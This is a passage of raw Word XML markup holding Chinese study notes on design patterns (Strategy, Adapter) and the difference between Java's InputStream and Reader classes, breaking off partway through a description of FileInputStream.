          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）由于策略模式把每个具体的策略实现都单独封装成为类，如果备选的策略很多的话，那么对象的数目就会很可观。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7C05" w:rsidRPr="006C4E9C" w:rsidRDefault="00CD7C05" w:rsidP="00CD7C05">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidR="00A14BDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>适配器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00CD7C05">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>适配器模式将一个接口转换成客户希望的另外一个接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。它使得原来由于接口不兼容而不能在一起工作的那些类可以一起工作</w:t>
      </w:r>
      <w:r w:rsidRPr="00C723E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7C05" w:rsidRPr="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00CD7C05">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A14BDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>适用情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7C05" w:rsidRPr="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00CD7C05">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以下情况使用适配器模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7C05" w:rsidRPr="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00CD7C05">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你想使用一个已经存在的类，而它的接口不符合你的需求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00CD7C05">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你想创建一个可以复用的类，该类可以与其他不相关的类或不可预见的类（即那些接口可能不一定兼容的类）协同工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7C05" w:rsidRPr="00CD7C05" w:rsidRDefault="00CD7C05" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00652739" w:rsidRDefault="00652739" w:rsidP="00652739">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00F44ECC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidR="00F44ECC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00F44ECC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidR="00F44ECC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44ECC" w:rsidRPr="00F44ECC" w:rsidRDefault="008C2ED4" w:rsidP="00F44ECC">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java.io</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下面有两个抽象类：</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是表示字节输入流的所有类的超类</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是用于读取字符流的抽象类</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提供的是字节流的读取，而非文本读取，这是和</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类的根本区别。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取出来的是</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数组或者</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取出来的是</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数组。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>弄清了两个超类的根本区别，再来看他们底下子类的使用，这里只对最常用的几个说明</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>   | __FileInputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">FileInputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从文件系统中的某个文件中获得输入字节。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>构造方法摘要</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileInputStream (File  file) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过打开一个到实际文件的连接来创建一个</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileInputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
